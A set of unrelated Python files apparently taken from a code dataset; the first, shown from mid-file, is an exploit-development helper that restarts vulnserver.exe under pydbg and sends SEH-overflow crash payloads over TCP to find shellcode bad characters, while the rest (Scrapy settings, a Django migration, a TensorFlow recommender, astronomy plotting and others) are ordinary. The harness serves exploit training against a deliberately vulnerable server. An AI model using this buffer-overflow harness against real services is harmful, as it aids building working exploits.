"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
process_name = "vulnserver.exe" ##CHANGE THIS
process_is_running = False
good_chars = []
bad_chars = []
lock = threading.Lock()
start_crash = False
start_cmd = 'start cmd /C "C:\\start.bat"' ##CHANGE THIS
#start_cmd = 'C:\\start.bat' ##CHANGE THIS
#start_cmd = "net start vulnserver.exe"
def start_service(process_name,start_cmd):
global pid
##NOCHANGESINTHEFUNCTION
pythoncom.CoInitialize ()
for process in wmi.WMI().Win32_Process():
if process.Name==process_name:
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /im '+ process_name + ' /f').communicate()
process_is_running = False
print("[+] Starting the service...")
# Start the process with reliability
#subprocess.Popen('taskkill /im ovas.exe /f').communicate()
#subprocess.Popen('C:/Program Files/HP OpenView/bin/ovas.exe', stdin=PIPE, stderr=PIPE, stdout=PIPE).communicate()
os.system(start_cmd)
print ("[*] Waiting for the process to start ..")
process_is_running = True
time.sleep(2)
pid = find_process_id(process_name, process_is_running)
if pid:
print("[+] The service was started.")
global start_crash
lock.acquire()
start_crash = True
lock.release()
print "[+] Crash Flag set to" + str(start_crash)
else:
print("[-] Service was not found in process list. Restarting...")
return start_service(process_name,start_cmd)
def find_process_id(process_name, process_is_running):
##NOCHANGESINTHEFUNCTION
#Function to find the process ID and return pid
# Get the process ID of the services
print "[2] Making sure the service " + process_name + " was restarted and getting the pid"
process_check_counter = 0
pythoncom.CoInitialize ()
while process_is_running:
for process in wmi.WMI().Win32_Process():
if process.Name==process_name:
print "[+]The process is running with process id: " + str(process.ProcessId)
return process.ProcessId
if process_check_counter > 4: # Give it 5 attempts
print "[-] Failed to get the pid or start the process"
return False
process_check_counter += 1
def check_accessv(dbg):
##NOCHANGESINTHEFUNCTION
# We skip first-chance exceptions
#if dbg.dbg.u.Exception.dwFirstChance:
# return DBG_EXCEPTION_NOT_HANDLED
#crash_bin = utils.crash_binning.crash_binning()
#crash_bin.record_crash(dbg)
#print crash_bin.crash_synopsis()
##CHANGE THIS
esp_offset = 0x25 # this is in hex
print "[+] Access violation caught!!"
print "EAX: %08x" % (dbg.context.Eax)
print "ESP: %08x" % (dbg.context.Esp)
print "EIP: %08x" % (dbg.context.Eip)
# I had an offset of 37 or 0x25 from the ESP to crash payload
esp_dump = dbg.read(dbg.context.Esp + esp_offset, 4) # dump 4 bytes in memory pointed by ESP
esp_dump_hex = esp_dump.encode('hex')
print esp_dump_hex
identify_bad_characters(esp_dump_hex)
#dbg.terminate_process()
#return DBG_CONTINUE
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def start_debugging(pid):
##NOCHANGESINTHEFUNCTION
print "[3] Attaching the process to pydbg"
dbg = pydbg()
dbg.attach(int(pid))
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION,check_accessv)
dbg.run()
#return start_service()
def identify_bad_characters(esp_memory_dump):
##NOCHANGESINTHEFUNCTION
global good_chars, bad_chars
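# The crash payload wrote the candidate byte four times at ESP + esp_offset; if
# the hex dump read back equals four copies of that byte, nothing in the target
# mangled it, so it is safe for shellcode. Any mismatch marks it as a bad character.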
if (esp_memory_dump == current_char * 4):
print "[+] I found a good character: " + str(current_char)
good_chars.append(current_char)
with open("c:\\good_character_list.txt",'a+') as f:
f.write("\\x" + str(current_char))
else:
print "[+] I found a bad character: " + str(current_char)
bad_chars.append(current_char)
with open("c:\\bad_character_list.txt",'a+') as f:
f.write("\\x" + str(current_char))
with open("c:\\all_character_list.txt", 'a+') as f:
f.write("\\x" + str(current_char) + " => " + str(esp_memory_dump) +"\n" )
print "[+] Printing all bad characters: " + str(bad_chars)
print "[+] Printing all good characters: " + str(good_chars)
def crash_me():
print("[+] Entered crash_me");
global start_crash, current_char
lock.acquire()
start_crash = False
lock.release()
counter = 0
timer= 0
while True:
print start_crash
if start_crash:
if counter < (len(allchars)):
time.sleep(10)
current_char = allchars[counter].encode('hex')
print "[+] The currrent character is " + str(current_char) + " of index " + str(counter)
junk0 = allchars[counter] * 4 # put the bad character here
#Copy pasta the crash function here
host = "192.168.214.135"
port = 9999
nseh_offset = 3491-4
seh_offset = 3491
total_buffer = 5005
#junk1 = "\x41" * nseh_offset
##CHANGE THIS
junk1 = junk0 + "\x41" * (nseh_offset - len(junk0))
##CHANGE THIS
nseh = "\x42" * 4
seh = "\x41" * 4
junk2 = "\x44" * (total_buffer - seh_offset)
junk = junk1 + nseh + seh + junk2
cmd = "LTER /.:/{}\r\n"
payload = cmd + junk + "\r\n\r\n"
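# Payload layout: the candidate byte x4, "A" filler up to the nSEH offset,
# 4-byte nSEH/SEH placeholders, then trailing filler out to the full
# 5005-byte buffer.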
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #SOCK_STREAM for TCP
s.connect((host, port))
s.recv(999999)
s.send(payload)
s.close()
print "[1] Crash payload of size: " + str(len(payload)) + " sent!"
except:
print "socket() failed"
sys.exit(1)
start_crash = False
print "[1] Crash Flag set to" + str(start_crash)
counter+= 1
print "[*] Waiting before sending the next evil payload .."
time.sleep(10)
else:
print "[+] Succesfully completed going through all bad characters"
exit(0)
elif not start_crash:
print "[*] Start crash flag not set"
timer =0
time.sleep(1)
continue
elif timer > 10:
print "[-] Anomaly detected!!! - Waiting to restart ..."
time.sleep(1)
return start_service(process_name,start_cmd)
def main():
crasher_thread = threading.Thread(target=crash_me)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] Crash thread started");
while True:
start_service(process_name,start_cmd)
start_debugging(pid)
print "Process has been terminated"
if __name__ == '__main__':
main() |
999,371 | 3b3c8522a013177cbef72515373d2f9b73ec73aa | # -*- coding: utf-8 -*-
import os.path
import pymongo
import platform
from pcnile import sqlitedict as bsddb
BOT_NAME = 'wolf'
SPIDER_MODULES = ['wolf.spiders']
NEWSPIDER_MODULE = 'wolf.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36'
LOG_LEVEL = 'INFO'
CONCURRENT_REQUESTS = 10
COOKIES_ENABLED = True
DOWNLOAD_DELAY = 0
DOWNLOAD_TIMEOUT = 45
REDIRECT_MAX_TIMES = 3
EXTENSIONS = {
'scrapy.webservice.WebService': None,
'scrapy.telnet.TelnetConsole': None,
'scrapy.contrib.memusage.MemoryUsage': None,
'scrapy.contrib.memdebug.MemoryDebugger': None,
'scrapy.contrib.spiderstate.SpiderState': None,
'scrapy.contrib.throttle.AutoThrottle': None,
'scrapy.contrib.feedexport.FeedExporter': None,
'wolf.feedexport.FeedExporter': 500,
}
LOG_FILE = 'log.log'
# set all kinds of filter
if platform.system() == 'Linux':
DBDIR = '/opt/db/wolf'
else:
DBDIR = 'D:\\obtainfo\\Store\\db'
# make sure directory exists
if not os.path.exists(DBDIR):
os.makedirs(DBDIR)
UrlFilter = bsddb.open(os.path.join(DBDIR, 'url.db'), autocommit=True)
BtFilter = bsddb.open(os.path.join(DBDIR, 'bt.db'), autocommit=True)
Ed2kFilter = bsddb.open(os.path.join(DBDIR, 'ed2k.db'), autocommit=True)
NetdiskFilter = bsddb.open(os.path.join(DBDIR, 'netdisk.db'), autocommit=True)
OnlineFilter = bsddb.open(os.path.join(DBDIR, 'online.db'), autocommit=True)
if platform.system() == 'Linux':
TORRENT_DIR = '/opt/db/torrent'
else:
TORRENT_DIR = 'D:\\obtainfo\\Store\\torrent'
# make sure directory exists
if not os.path.exists(TORRENT_DIR):
os.makedirs(TORRENT_DIR)
# mongodb store
Collection = pymongo.Connection().scrapy.wolf
|
999,372 | fa932327238c16f83e1b29bf0e0698d09a21c73b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
RESIZED_NEGATIVE_PATH = 'resized_negative_images'
RESIZED_POSITIVE_PATH = 'resized_positive_images'
def create_output_directory_for_resized_images():
"""
Create the output directories for both resized negative and positive images.
"""
try:
if not os.path.isdir(RESIZED_NEGATIVE_PATH):
os.makedirs(RESIZED_NEGATIVE_PATH)
if not os.path.isdir(RESIZED_POSITIVE_PATH):
os.makedirs(RESIZED_POSITIVE_PATH)
except OSError as e:
print('Error --> {}'.format(e))
def get_data_images(path):
"""
Collect the image file paths under ``path``.
"""
return sorted(
[os.path.join(root, filename) for root, dirnames, filenames in os.walk(path) for filename in
filenames if
filename.endswith('.jpg') and os.path.getsize(os.path.join(root, filename)) > 0]
)
|
999,373 | 36b4a0240018e93135358622c32cd7ce01a3f989 | class Solution:
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
table=[[False]*(len(s)+1) for _ in range(len(p)+1)]
table[0][0]=True
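# table[i][j] is True iff pattern prefix p[:i] matches string prefix s[:j].
# The loop below seeds column 0: a pattern prefix ending in '*' can match the
# empty string by dropping its trailing "x*" pair, so table[i][0] = table[i-2][0].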
for i in range(1,len(p)+1):
if p[i-1]=='*':
table[i][0]=table[i-2][0]
for i in range(1,len(p)+1):
for j in range(1,len(s)+1):
if p[i-1]!='*':
table[i][j]=table[i-1][j-1] and (p[i-1]==s[j-1] or p[i-1]=='.')
else:
table[i][j]=table[i-2][j] or (table[i][j-1] and (s[j-1]==p[i-2] or p[i-2]=='.'))
return table[-1][-1]
a=Solution()
print(a.isMatch("aa",'a'))
print(a.isMatch("aa",'a*'))
print(a.isMatch("ab",'.*'))
print(a.isMatch("aab","c*a*b"))
print(a.isMatch("mississippi","mis*is*p*."))
|
999,374 | 04a832f70cb08c9584e7487b3aa572fc4b700f23 | from typing import Any, Dict
from ....models.models import ProjectorCountdown
from ....permissions.permissions import Permissions
from ....shared.exceptions import ActionException
from ....shared.filters import And, FilterOperator
from ....shared.patterns import fqid_from_collection_and_id
from ...generics.create import CreateAction
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
@register_action("projector_countdown.create")
class ProjectorCountdownCreate(CreateAction):
"""
Action to create a projector countdown.
"""
model = ProjectorCountdown()
schema = DefaultSchema(ProjectorCountdown()).get_create_schema(
required_properties=["meeting_id", "title"],
optional_properties=[
"description",
"default_time",
],
)
permission = Permissions.Projector.CAN_MANAGE
def update_instance(self, instance: Dict[str, Any]) -> Dict[str, Any]:
self.check_title_unique(instance)
# set default_time if needed and countdown_time
if not instance.get("default_time"):
meeting = self.datastore.get(
fqid_from_collection_and_id("meeting", instance["meeting_id"]),
["projector_countdown_default_time"],
lock_result=False,
)
instance["default_time"] = meeting.get("projector_countdown_default_time")
instance["countdown_time"] = instance["default_time"]
return instance
def check_title_unique(self, instance: Dict[str, Any]) -> None:
title_filter = And(
FilterOperator("meeting_id", "=", instance["meeting_id"]),
FilterOperator("title", "=", instance["title"]),
)
if self.datastore.exists(self.model.collection, title_filter):
raise ActionException("Title already exists in this meeting.")
|
999,375 | dbae9e1ed105de239d2290afcc87abcff5a2201f | import os
import random
import itertools
import time
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from model import *
#from recommendation_worker_nn import *
from parser_file import *
from utils import *
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.logging.set_verbosity(tf.logging.ERROR)
os.environ["GLOG_minloglevel"] ="3"
print (" --- Recsys Challenge 2017 --- ")
USERS_FILE = "../users.csv"
ITEMS_FILE = "../items.csv"
INTERACTIONS_FILE = "../interactions.csv"
TARGET_USERS = "../targetUsers.csv"
TARGET_ITEMS = "../targetItems.csv"
OUT_FILE = "out_cnn.csv"
FEATURE_DIM = 6
TH = -10
N_CLASS = 5
### set all variables
seed = 128
rng = np.random.RandomState(seed)
input_num_units = 60
output_num_units = 5
dropout = 1 # Dropout, probability to keep units
epochs = 50
batch_size = 128
learning_rate = 0.01
'''
1) Parse the challenge data, excluding all impressions
'''
with tf.device('/gpu:0'):
(header_users, users) = select(USERS_FILE, lambda x: True, build_user, lambda x: int(x[0]))
(header_items, items) = select(ITEMS_FILE, lambda x: True, build_item, lambda x: int(x[0]))
#transfer data into ndarray
X_val = []
#Y_prob_val = np.zeros([1, 5])
Y_val = np.zeros(N_CLASS)
ui_score = dict()
cnt = 0
for line in itertools.islice(open(INTERACTIONS_FILE), 100000):
cnt += 1
if is_header(line):
header = process_header(line.strip().split('\t'))
else:
cmp = line.strip().split('\t')
inter_type = int(cmp[header['interaction_type']])
user_id = int(cmp[header['user_id']])
item_id = int(cmp[header['item_id']])
if inter_type != 0:
ui_score[user_id] = ui_score.get(user_id, dict())
ui_score[user_id][item_id] = ui_score[user_id].get(item_id, set())
ui_score[user_id][item_id].add(inter_type)
if cnt % 1000000 == 0:
print("... reading line %d from file %s" % (cnt, INTERACTIONS_FILE))
for u_id, jobs in ui_score.items():
for j_id, inter_types in jobs.items():
x = getFeat(users[u_id], items[j_id])
X_val.append(x)
y = getMultiIntScore(inter_types)
Y_val = np.concatenate((Y_val, y))
train_x = np.stack(X_val).reshape(-1, input_num_units)
train_x = preproc(train_x)
print(train_x.shape)
Y_val = Y_val.reshape(-1, N_CLASS)
#print(Y_val[1:10,:])
train_y = Y_val[1:]
print(train_y.shape)
#train_y = Y_val[1:]
split_size = int(train_x.shape[0] * 0.7)
train_x, val_x = train_x[:split_size], train_x[split_size:]
train_y, val_y = train_y[:split_size], train_y[split_size:]
# define placeholders
x = tf.placeholder(tf.float32, [None, input_num_units])
y = tf.placeholder(tf.float32, [None, output_num_units])
keep_prob = tf.placeholder(tf.float32) # dropout (keep probability)
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],
padding='SAME')
# Create model
def conv_net(x, weights, biases, dropout):
# Reshape the flat feature vector into an image-like grid
x = tf.reshape(x, shape=[-1, 10, 6, 1])
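# Shape walkthrough: the 60 input features are laid out as a 10x6x1 grid; two
# 2x2 max-pools with SAME padding shrink 10x6 -> 5x3 -> 3x2, so the flattened
# fc1 input is 3*2*64, matching weights['wd1'].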
# Convolution Layer
conv1 = conv2d(x, weights['wc1'], biases['bc1'])
# Max Pooling (down-sampling)
conv1 = maxpool2d(conv1, k=2)
# Convolution Layer
conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])
# Max Pooling (down-sampling)
conv2 = maxpool2d(conv2, k=2)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
print(weights['wd1'].get_shape().as_list()[0])
fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
fc1 = tf.nn.dropout(fc1, dropout)
# Output, class prediction
out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])
return out
# Store layers weight & bias
weights = {
# 3x3 conv, 1 input channel, 32 output channels
'wc1': tf.Variable(tf.random_normal([3, 3, 1, 32])),
# 3x3 conv, 32 input channels, 64 output channels
'wc2': tf.Variable(tf.random_normal([3, 3, 32, 64])),
# fully connected, 3*2*64 inputs (10x6 map halved twice by pooling), 84 outputs
'wd1': tf.Variable(tf.random_normal([3*2*64, 84])),
# 84 inputs, 5 outputs (class prediction)
'out': tf.Variable(tf.random_normal([84, output_num_units]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([32])),
'bc2': tf.Variable(tf.random_normal([64])),
'bd1': tf.Variable(tf.random_normal([84])),
'out': tf.Variable(tf.random_normal([output_num_units]))
}
# Construct model
pred = conv_net(x, weights, biases, keep_prob)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=pred, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Initializing the variables
init = tf.global_variables_initializer()
print('mark-1')
with tf.Session() as sess:
print('mark0')
# create initialized variables
sess.run(init)
### for each epoch, do:
### for each batch, do:
### create pre-processed batch
### run optimizer by feeding batch
### find cost and reiterate to minimize
for epoch in range(epochs):
avg_cost = 0
total_batch = int(train_x.shape[0] / batch_size)
for i in range(total_batch):
batch_x, batch_y = batch_creator(batch_size, train_x.shape[0], train_x, train_y, input_num_units, rng)
_, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y: batch_y, keep_prob: dropout})
avg_cost += c / total_batch
print("Epoch:", (epoch + 1), "loss =", "{0:.5f}".format(float(avg_cost)))
print("\nTraining complete!")
# find predictions on val set
# one correct
# pred_temp = tf.losses.mean_squared_error(pred, y)
#val_loss = tf.reduce_mean(tf.cast(pred_temp, "float"))
#v=val_loss.eval({x: val_x.reshape(-1, input_num_units), y: val_y, keep_prob: dropout})
#print("Validation Loss:", float(v/1e10))
print('mark2')
'''
4) Create target sets for items and users
'''
target_users = []
for line in open(TARGET_USERS):
target_users += [int(line.strip())]
target_users = set(target_users)
target_items = []
for line in open(TARGET_ITEMS):
target_items += [int(line.strip())]
with open(OUT_FILE, 'w') as fp:
pos = 0
average_score = 0.0
num_evaluated = 0.0
for i in target_items:
data = []
ids = []
# build all (user, item) pair features based for this item
for u in target_users:
xx = getFeat(users[u], items[i])
#f = x.features()
#data += [f]
#ids += [u]
if float(len(set(users[u].title).intersection(set(items[i].title)))) > 0:
f = preproc(xx)
data += [f]
ids += [u]
if len(data) > 0:
data = np.array(data).reshape(-1, input_num_units)
test_x = data.astype('float')
test_y = np.zeros((data.shape[0], output_num_units))
'''
test_prediction = tf.nn.softmax(tf.nn.relu(tf.matmul(
tf.nn.relu(tf.add(tf.matmul(data, weights['hidden']), biases['hidden']))) + bout)))
'''
#print(type(data))
#print(type(test_y))
#print(type(output_layer))
prediction = tf.sigmoid(pred)
#prediction = tf.cast(pred, "float")
#ypred = prediction.eval({x: data})
classification = sess.run(prediction, feed_dict={x: test_x, keep_prob: dropout})
ypred = classification[:,0] + 5*classification[:, 1] + 5*classification[:, 2] - 10*classification[:, 3] +20*classification[:, 4]
#print(classification.shape)
#print(ypred)
#ypred = classification[0]
#score need updated
user_ids = sorted(
[
(ids_j, ypred_j) for ypred_j, ids_j in zip(ypred, ids) if ypred_j > TH
],
key=lambda x: -x[1]
)[0:99]
# write the results to file
if len(user_ids) > 0:
item_id = str(i) + "\t"
fp.write(item_id)
for j in range(0, len(user_ids)):
user_id = str(user_ids[j][0]) + ","
fp.write(user_id)
user_id = str(user_ids[-1][0]) + "\n"
fp.write(user_id)
fp.flush()
# Every 100 iterations print some stats
if pos % 100 == 0:
percentageDown = str(pos / float(len(target_items)))
print(OUT_FILE + " " + percentageDown)
pos += 1
|
999,376 | 75f02364e15680b822ddcc601c42064956edcf96 | print "Age:",
age = raw_input()
print "Height (inches)",
height = raw_input()
print "Weigha (lbs):",
weight = raw_input()
print "So, you're %r years old, %r inches tall, and weigh %r pounds." % (age, height, weight)
|
999,377 | 303aed6d45370599c7af5924a982a4747cc9e949 | # Generated by Django 3.1.7 on 2021-02-27 06:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0017_auto_20210227_1056'),
]
operations = [
migrations.RenameField(
model_name='softwares',
old_name='features',
new_name='features_content',
),
migrations.RenameField(
model_name='softwares',
old_name='sub_features_head',
new_name='features_head',
),
migrations.RemoveField(
model_name='softwares',
name='sub_features_content',
),
migrations.AlterField(
model_name='about',
name='position',
field=models.CharField(max_length=50, null=True),
),
migrations.AlterField(
model_name='about',
name='profile',
field=models.CharField(max_length=50, null=True),
),
]
|
999,378 | 96dfd8f1a972e7801b288a0a0656a2ab42d7c099 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Lacerda@Granada - 26/Nov/2014
#
import numpy as np
import h5py
import matplotlib as mpl
from matplotlib import pyplot as plt
import sys
from plot_aux import get_attrib_h5, density_contour, \
list_gal_sorted_by_data, calcRunningStats, \
data_uniq, plot_text_ax, plot_linreg_params
from matplotlib.ticker import MultipleLocator
from scipy import stats as st
def plot_gal_img_ax(ax, imgfile, gal):
galimg = plt.imread(imgfile)
ax.imshow(galimg)
txt = '%s' % gal
plot_text_ax(ax, txt, 0.05, 0.92, 8, 'top', 'left')
def plot_reglin_ax(ax, x, y, txt_x_pos, txt_y_pos, color):
y_slope, y_intercept, y_r_value, y_p_value, y_std_err = st.linregress(x, y)
step = (x.max() - x.min()) / len(x)
X = np.linspace(x.min(), x.max() + step, len(x))
Y = y_slope * X + y_intercept
ax.plot(X, Y, c = color, ls = '-', lw = 2)
txt = 'y = %.2fx+%.2f' % (y_slope, y_intercept)
plot_text_ax(ax, txt, txt_x_pos, txt_y_pos, 8, 'top', 'left', color)
return y_slope, y_intercept, y_r_value, y_p_value, y_std_err
def new_img_mosaic(NRows, NCols, age, ticks, sorted_by):
f, axArr = plt.subplots(NRows, NCols)
f.set_dpi(300)
f.set_size_inches(11.69,8.27)
plt.setp([a.get_xticklabels() for a in f.axes], visible = False)
plt.setp([a.get_yticklabels() for a in f.axes], visible = False)
plot_suptitle = '%.2f Myr' % (age/1e6)
if ticks:
plot_suptitle = '%s xlim fixed' % plot_suptitle
plot_suptitle = '%s - sort_param: %s' % (plot_suptitle, sorted_by)
f.suptitle(plot_suptitle)
for ax in f.axes:
ax.set_axis_off()
return f, axArr
def save_img_mosaic(f, fname, ticks):
plt.subplots_adjust(wspace=0, hspace=0, left=0.1, bottom=0.1, right=0.9, top=0.95)
if ticks:
fname = '%s_xfix' % (fname)
f.savefig('%s.png' % fname)
sort_param = {
'Mcor' : False,
'McorSD' : False,
'MorphType' : False,
'Mr' : False,
'u-r' : False,
}
try:
h5file = sys.argv[1]
iT = np.int(sys.argv[2])
sorted_by = sys.argv[3]
except IndexError:
print 'usage: %s HDF5FILE [0-39] %s' % (sys.argv[0], sort_param.keys())
exit(1)
mpl.rcParams['font.size'] = 16
mpl.rcParams['axes.labelsize'] = 16
mpl.rcParams['axes.titlesize'] = 18
mpl.rcParams['xtick.labelsize'] = 12
mpl.rcParams['ytick.labelsize'] = 12
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] = 'Times New Roman'
h5 = h5py.File(h5file, 'r')
tSF__T = get_attrib_h5(h5, 'tSF__T')
# zones
SFR__Tg = get_attrib_h5(h5, 'SFR__Tg')
SFR_Ha__g = get_attrib_h5(h5, 'SFR_Ha__g')
SFRSD__Tg = get_attrib_h5(h5, 'SFRSD__Tg')
SFRSD_Ha__g = get_attrib_h5(h5, 'SFRSD_Ha__g')
SFRSD_Ha_kpc__g = get_attrib_h5(h5, 'SFRSD_Ha_kpc__g')
dist_zone__g = get_attrib_h5(h5, 'dist_zone__g')
tau_V__Tg = get_attrib_h5(h5, 'tau_V__Tg')
tau_V_neb__g = get_attrib_h5(h5, 'tau_V_neb__g')
L_int_Ha__g = get_attrib_h5(h5, 'L_int_Ha__g')
F_obs_Ha__g = get_attrib_h5(h5, 'F_obs_Ha__g')
Mcor__g = get_attrib_h5(h5, 'Mcor__g')
McorSD__g = get_attrib_h5(h5, 'McorSD__g')
# galaxy wide quantities replicated by zones
Mcor_GAL_zones__g = get_attrib_h5(h5, 'Mcor_GAL_zones__g')
McorSD_GAL_zones__g = get_attrib_h5(h5, 'McorSD_GAL_zones__g')
morfType_GAL_zones__g = get_attrib_h5(h5, 'morfType_GAL_zones__g')
at_flux_GAL_zones__g = get_attrib_h5(h5, 'at_flux_GAL_zones__g')
califaID_GAL_zones__g = get_attrib_h5(h5, 'califaID_GAL_zones__g')
Mr_GAL_zones__g = get_attrib_h5(h5, 'Mr_GAL_zones__g')
ur_GAL_zones__g = get_attrib_h5(h5, 'ur_GAL_zones__g')
sort_param['Mcor'] = np.log10(Mcor_GAL_zones__g)
sort_param['McorSD'] = np.log10(McorSD_GAL_zones__g)
sort_param['MorphType'] = morfType_GAL_zones__g
sort_param['Mr'] = Mr_GAL_zones__g
sort_param['u-r'] = ur_GAL_zones__g
label = { '%s' % k : False for k in sort_param.keys()}
label['Mcor'] = r'$\log\ M_\star^{gal}\ [M_\odot]$'
label['McorSD'] = r'$\log\ \mu_\star^{gal}\ [M_\odot\ pc^{-2}]$'
label['MorphType'] = r'Morphological type'
label['Mr'] = r'$M_r$'
label['u-r'] = r'u - r'
NGal, listGal_ns, sorted_data__g = data_uniq(califaID_GAL_zones__g, sort_param[sorted_by])
listGal = list_gal_sorted_by_data(listGal_ns, sorted_data__g, -1)
#ticks = True
ticks = False
min_pixel_to_plot = 5
fname_suffix = 'sor%s_%.2fMyr' % (sorted_by, tSF__T[iT]/1e6)
###################################################################################
xname = 'dtau'
yname = 'SFR_Ha'
newImage = True
NRows = 7
NCols = 10
iGal = 0
i = 0
j = 0
k = 0
last_row = 0
dtau_slope = np.ma.masked_all((NGal))
dtau_x0 = np.ma.masked_all((NGal))
dtau_stderr = np.ma.masked_all((NGal))
dtau_r = np.ma.masked_all((NGal))
while iGal < NGal:
if newImage:
f, axArr = new_img_mosaic(NRows, NCols, tSF__T[iT], ticks, sorted_by)
newImage = False
gal = listGal[iGal]
where_slice = np.where(califaID_GAL_zones__g == gal)[0]
N_zone = len(where_slice)
x1 = tau_V__Tg[iT][where_slice]
x2 = tau_V_neb__g[where_slice]
y = np.ma.log10(SFR_Ha__g[where_slice])
mask = ~(x1.mask | x2.mask | y.mask)
x1m = x1[mask]
x2m = x2[mask]
ym = y[mask]
xm = x2m - x1m
N_not_masked = mask.sum()
if N_not_masked >= min_pixel_to_plot:
last_row = i
ax1 = axArr[i, j]
j += 1
ax2 = axArr[i, j]
ax1.set_axis_on()
ax2.set_axis_on()
#print '%s %d %d' % (gal, N_zone, N_not_masked)
xlabel = r'$\delta\tau\ [\tau_V^{neb}\ -\ \tau_V^\star]$'
ylabel = r'$\log\ SFR_{neb}\ $[M${}_\odot$ yr${}^{-1}]$'
ax1.scatter(xm, ym, c = 'k', marker = 'o', s = 10., edgecolor = 'none', alpha = 0.6)
xlim = [ -1, 2. ]
ylim = [-4., -0.5]
ax1.set_xlim(xlim)
if ticks:
ax1.set_ylim(ylim)
#ax.set_title(r'%.2f Myr' % (tSF__T[iT] / 1.e6))
#ax.legend(fontsize = 14, frameon = False, loc = 'upper right')
# notice the change in y and x axis so:
# log SFR = A log_dtau + B
aux = plot_reglin_ax(ax1, xm, ym, 0.05, 0.92, 'k')
dtau_slope[iGal] = aux[0]
dtau_x0[iGal] = aux[1]
dtau_r[iGal] = aux[2]
dtau_stderr[iGal] = aux[4]
plot_gal_img_ax(ax2, '/Users/lacerda/CALIFA/images/%s.jpg' % gal, gal)
if ticks and i == NRows - 1 and j == 1:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if i == NRows - 1 and j == 5:
ax2.set_xlabel(xlabel)
if i == 3 and j == 1:
ax1.set_ylabel(ylabel)
if j == NCols - 1:
if i == NRows -1:
i = 0
newImage = True
save_img_mosaic(f, '%s_%s_%s_%d' % (xname, yname, fname_suffix, k), ticks)
plt.close(f)
k += 1
else:
i += 1
j = 0
else:
j += 1
if newImage == False and iGal == NGal - 1:
ax1 = axArr[last_row, 0]
if ticks:
plt.setp(ax1.get_xticklabels(), visible = True, rotation = 90)
plt.setp(ax1.get_yticklabels(), visible = True)
if last_row < NRows - 1:
ax = axArr[last_row, 5]
ax.set_xlabel(xlabel)
if last_row < 3:
ax1.set_ylabel(ylabel)
save_img_mosaic(f, '%s_%s_%s_%d' % (xname, yname, fname_suffix, k), ticks)
plt.close(f)
iGal += 1
ylab = r'$\delta\tau$'
plot_linreg_params(dtau_slope, sorted_data__g, label[sorted_by],
r'%s slope' % ylab, '%s_slope_%s.png' % (xname, fname_suffix),
best_param = 1., fontsize = 8)
plot_linreg_params(dtau_x0, sorted_data__g, label[sorted_by],
r'%s x0' % ylab, '%s_x0_%s.png' % (xname, fname_suffix),
best_param = 0., fontsize = 8)
plot_linreg_params(dtau_stderr, sorted_data__g, label[sorted_by],
r'%s stderr' % ylab, '%s_stderr_%s.png' % (xname, fname_suffix))
plot_linreg_params(dtau_r**2., sorted_data__g, label[sorted_by],
r'%s $r^2$' % ylab, '%s_sqrcor_%s.png' % (xname, fname_suffix),
best_param = 1., fontsize = 8)
##########################################################################################
x1name = 'tau_V'
x2name = 'tau_V_neb'
yname = 'SFR_Ha'
newImage = True
NRows = 7
NCols = 10
iGal = 0
i = 0
j = 0
k = 0
min_pixel_to_plot = 5
last_row = 0
tau_V_slope = np.ma.masked_all((NGal))
tau_V_x0 = np.ma.masked_all((NGal))
tau_V_stderr = np.ma.masked_all((NGal))
tau_V_r = np.ma.masked_all((NGal))
tau_V_neb_slope = np.ma.masked_all((NGal))
tau_V_neb_x0 = np.ma.masked_all((NGal))
tau_V_neb_stderr = np.ma.masked_all((NGal))
